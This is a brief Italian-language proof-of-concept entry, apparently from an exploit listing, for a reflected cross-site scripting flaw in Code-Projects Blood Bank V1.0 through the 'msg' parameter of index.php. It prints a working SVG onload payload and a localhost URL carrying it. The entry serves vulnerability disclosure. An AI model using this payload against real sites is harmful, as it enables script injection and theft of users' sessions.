
Proof-of-concept exploit per cross-site scripting riflesso (XSS) in Code-Projects Blood Bank V1.0 tramite il parametro 'msg' in index.php, con dimostrazione di payload.
<div><svg/onload=alert(document.domain)>http://localhost/bloodbank/index.php?msg=<div><svg/onload=alert(document.domain)>